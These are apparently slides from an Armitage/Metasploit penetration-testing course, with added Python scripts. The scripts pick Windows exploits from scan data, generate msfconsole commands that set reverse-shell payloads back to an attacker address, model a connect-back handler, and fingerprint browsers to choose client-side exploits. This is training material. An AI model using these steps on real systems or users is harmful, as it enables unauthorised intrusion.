Slide 3: Overview
- Personal Introduction
- Penetration Testing Process
- Course Overview

Slide 4: Introduction – R. Mudge
Previous experiences:
- Penetration Tester
- Regional CCDC Red Team x 5
- USAF Security Researcher
- Armitage for Metasploit
Other experiences:
- WordPress grammar checker
- Programming language

Slide 5: Penetration Testing – What?
Test security by doing what bad guys might do.

Slide 6: Penetration Testing – Why?
Motivate the desire to make changes that improve security.
Slide 25: Console Cheat Sheet
- use <module> - start configuring a module
- show options - show the module's configurable options
- set <varname> <value> - set an option
- exploit - launch an exploit module
- run - launch a non-exploit module
- sessions -i <n> - interact with session n
- help <command> - get help for a command

Slide 26: msfconsole
- Open ended
- Works in many places
- One task / host at a time

Slide 27: What is Armitage?
- A GUI for Metasploit
- Goal: avoid this…
Slide 35: Remote Attack
1. Nmap scan
2. Analyze scan data
3. Choose an exploit
4. Select a payload
5. Launch exploit!

Slide 36: Which exploit do I use? Answer: these.
Name                    Where
ms08_067_netapi         Windows XP / 2003 era
ms09_050_smb2_negot..   Windows Vista SP1 / SP2
ms03_026_dcom           Windows 2000
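The "analyze scan data" and "choose an exploit" steps of the remote attack, followed by the cheat-sheet command sequence (use / set / exploit), as an added Python example that is not part of the course material. The Nmap XML is a constructed sample rather than a real scan; the full module paths, the port each module targets (netapi on 445, dcom on 135), the RHOSTS/PAYLOAD/LHOST option names and the attacker address 10.0.0.1 are assumptions added here. The table covers the two modules the slide names in full.

```python
"""Added example, not part of the course slides: the remote-attack steps
"analyze scan data" and "choose an exploit" as a script around Nmap -oX
output, ending in the cheat-sheet command sequence (use / set / exploit).
The Nmap XML is a constructed sample (no real scan), and the port/module
mapping below is an assumption added here."""
import xml.etree.ElementTree as ET

# (full module path, port the exploit targets, OS-match substrings) for the
# modules the slide names in full. Assumption: netapi is SMB on 445, dcom is
# DCE-RPC on 135.
EXPLOIT_TABLE = [
    ("exploit/windows/smb/ms08_067_netapi", 445,
     ("Windows XP", "Windows Server 2003", "Windows 2003")),
    ("exploit/windows/dcerpc/ms03_026_dcom", 135, ("Windows 2000",)),
]

# Constructed Nmap XML (shape of `nmap -sV -O -oX out.xml`), three hosts: an
# XP box with SMB open, a Windows 2000 box whose 445 is filtered, and a Linux
# web server that nothing in the table fits.
SAMPLE_SCAN = """<nmaprun>
  <host><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="98"/></os>
  </host>
  <host><address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 2000 SP4" accuracy="95"/></os>
  </host>
  <host><address addr="10.0.0.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="90"/></os>
  </host>
</nmaprun>
"""


def parse_scan(xml_text):
    """Return [(ip, os_match_name, {open tcp ports})] for every host."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        osmatch = host.find("os/osmatch")
        os_name = osmatch.get("name") if osmatch is not None else ""
        open_ports = {
            int(p.get("portid"))
            for p in host.findall("ports/port")
            if p.get("protocol") == "tcp" and p.find("state").get("state") == "open"
        }
        hosts.append((ip, os_name, open_ports))
    return hosts


def choose_exploits(os_name, open_ports):
    """Modules whose OS tag matches and whose target port is actually open.
    A filtered port (a firewall, the first entry on "why did my exploit
    fail?") disqualifies a module before it is ever launched."""
    return [
        module for module, port, os_tags in EXPLOIT_TABLE
        if port in open_ports and any(tag in os_name for tag in os_tags)
    ]


def msfconsole_commands(module, rhost, lhost,
                        payload="windows/meterpreter/reverse_tcp"):
    """The cheat-sheet sequence for one exploit module. LHOST is the
    attacker address the reverse payload connects back to (assumed)."""
    return [
        f"use {module}",
        f"set RHOSTS {rhost}",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        "exploit",
    ]


def plan(xml_text, lhost):
    """Per host: one command list per candidate module. An empty list means
    no table entry fits and the exploit-free attack is the fallback."""
    return {
        ip: [msfconsole_commands(m, ip, lhost) for m in choose_exploits(os_name, ports)]
        for ip, os_name, ports in parse_scan(xml_text)
    }


if __name__ == "__main__":
    for ip, runs in plan(SAMPLE_SCAN, "10.0.0.1").items():
        print(ip, "->", " / ".join(r[0] for r in runs) or "no candidate; use exploit-free attack")
```

Run it and 10.0.0.5 gets the netapi sequence, 10.0.0.7 gets dcom only (its 445 is filtered, so netapi is never a candidate), and 10.0.0.9 gets nothing, which is the cue to fall back to a payload plus multi/handler.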
Slide 37: Why did my exploit fail?
- Firewall
- Non-vulnerable software
- Service is hung
- The universe is taunting you
- Non-reliable exploit
- Bad day
- Mis-configured exploit
- Could not establish session
Slide 38: Exploit-free Attack
1. Choose a payload
2. Generate an executable
3. Set up a multi/handler

Slide 39: Payloads
Name                                       Note
windows/meterpreter/reverse_tcp            Connects back to one port
windows/meterpreter/reverse_tcp_allports   Tries every port in sequence
windows/meterpreter/reverse_https          Speaks HTTPS (!!!!)
java/meterpreter/reverse_tcp               Any platform with Java
linux/x86/shell_reverse_tcp
osx/x86/shell_reverse_tcp
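A localhost model of the two halves of the exploit-free attack, added here and not part of the course or of Metasploit: a handler that listens and waits (the job multi/handler does) and a payload that connects back, including the reverse_tcp_allports behaviour of trying ports in sequence until one answers. It uses plain sockets; the "whoami" exchange and the "victim\user" reply are invented for illustration, and nothing here generates a real executable.

```python
"""Added example, not part of the course: a localhost model of the
exploit-free attack's moving parts. Handler plays multi/handler (listens
and waits for a connect-back); the payload_* functions play reverse_tcp
stagers (connect back). The "whoami" exchange is invented for illustration;
no real payload executable is generated."""
import socket
import threading


class Handler:
    """Stand-in for `use exploit/multi/handler`, `set LHOST/LPORT`, `exploit`."""

    def __init__(self, lhost="127.0.0.1", accept_timeout=5.0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, 0))            # port 0: the kernel picks a free LPORT
        self.sock.listen(1)
        self.sock.settimeout(accept_timeout)  # don't wait forever if nothing calls back
        self.lport = self.sock.getsockname()[1]
        self.result = None

    def wait_for_session(self, command=b"whoami\n"):
        """Accept one connect-back, send a command, record the reply."""
        try:
            conn, _peer = self.sock.accept()
        except socket.timeout:
            return None
        with conn:
            conn.sendall(command)
            self.result = conn.recv(4096).decode().strip()
        self.sock.close()
        return self.result


def payload_reverse_tcp(lhost, lport, identity="victim\\user", timeout=2.0):
    """One connect-back attempt (reverse_tcp: a single LPORT).
    True if a handler answered; False if the port was closed or filtered,
    which is how a firewall looks from the payload's side."""
    try:
        with socket.create_connection((lhost, lport), timeout=timeout) as s:
            if s.recv(4096).strip() == b"whoami":
                s.sendall(identity.encode() + b"\n")
            return True
    except OSError:
        return False


def payload_reverse_tcp_allports(lhost, ports, **kw):
    """reverse_tcp_allports behaviour: try each port in sequence and stop at
    the first one where a handler answers; None if none did."""
    for port in ports:
        if payload_reverse_tcp(lhost, port, **kw):
            return port
    return None


def closed_port():
    """A loopback port with nothing listening, standing in for an LPORT that
    a firewall (or a handler nobody started) blocks."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Start a handler, let an allports stager find it past a dead port.
    Returns (port the stager settled on, handler's port, reply the handler got)."""
    h = Handler()
    t = threading.Thread(target=h.wait_for_session)
    t.start()
    used = payload_reverse_tcp_allports("127.0.0.1", [closed_port(), h.lport])
    t.join()
    return used, h.lport, h.result


if __name__ == "__main__":
    print(demo())
```

The order of operations is the point: the handler must be listening before the payload runs, otherwise the connect-back is refused exactly like the dead port in `demo()`, and the "Could not establish session" entry on the next slide is the symptom you see.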
Slide 40: Client-side Attack
1. Fingerprint a sample of victims
2. Choose an exploit
3. Launch the exploit
4. Spam victims (or wait for them)!

Slide 41: Which exploit do I use? Answer: these.
Name                     Where
java_signed_applet       Social engineering; anywhere Java applets run
ms11_003_ie_css_import   Internet Explorer 7/8 (requires .NET)
ie_createobject          Internet Explorer 6
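The "fingerprint a sample of victims" step, as an added Python example that is not part of the course: it reads browser User-Agent strings out of constructed web-server log lines, tallies what the sample is running, and maps each visitor to a module from the table above. The log lines are invented, and the check for a ".NET CLR" token as evidence that the .NET Framework is installed is an assumption about how older Internet Explorer versions advertised it; confirm against a real sample before relying on it.

```python
"""Added example, not part of the course: the "fingerprint a sample of
victims" step of a client-side attack. Constructed combined-format log
lines stand in for a captured sample; the module choice follows the
slide's table. Assumption: a ".NET CLR" token in an MSIE User-Agent means
the .NET Framework is present (the ms11_003 requirement)."""
import re
from collections import Counter

# Constructed sample: IE8 with .NET, IE6, IE7 without .NET, and Chrome on a Mac.
SAMPLE_LOG = """\
10.1.1.4 - - [01/Mar/2011:09:12:01 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727)"
10.1.1.5 - - [01/Mar/2011:09:12:07 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10.1.1.6 - - [01/Mar/2011:09:12:09 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
10.1.1.7 - - [01/Mar/2011:09:12:15 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24"
"""

UA_RE = re.compile(r'"([^"]*)"\s*$')   # last quoted field of a combined-format line
MSIE_RE = re.compile(r"MSIE (\d+)\.")


def fingerprint(line):
    """Return (browser, major version, has_dotnet) for one log line, or
    None if the line has no User-Agent field."""
    m = UA_RE.search(line)
    if not m:
        return None
    ua = m.group(1)
    ie = MSIE_RE.search(ua)
    if ie:
        return ("MSIE", int(ie.group(1)), ".NET CLR" in ua)
    return ("other", 0, False)


def choose_client_side(fp):
    """Map a fingerprint to a module name from the slide's table."""
    browser, major, dotnet = fp
    if browser == "MSIE" and major == 6:
        return "ie_createobject"
    if browser == "MSIE" and major in (7, 8) and dotnet:
        return "ms11_003_ie_css_import"
    return "java_signed_applet"   # social engineering; anywhere Java applets run


def survey(log_text):
    """Count how many visitors in the sample each module would cover."""
    counts = Counter()
    for line in log_text.splitlines():
        fp = fingerprint(line)
        if fp:
            counts[choose_client_side(fp)] += 1
    return counts


if __name__ == "__main__":
    for module, n in survey(SAMPLE_LOG).most_common():
        print(f"{module:24} {n}")
```

On the sample, IE7 without the .NET token and the Chrome visitor both fall through to java_signed_applet, which is why it is the catch-all on the slide: it needs a user to click rather than a specific browser bug.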
Slide 42: Learning Check
- Which module listens for a connection from a payload?
- Which exploit works against Windows XP SP2, port 445?
Slide 43: Armitage and Metasploit Penetration Testing Lab – Post-Exploitation

Slide 44: Overview
- Command Shell
- Privilege Escalation
- Spying on the User
- File Management
- Process Management
- Post Modules and Loot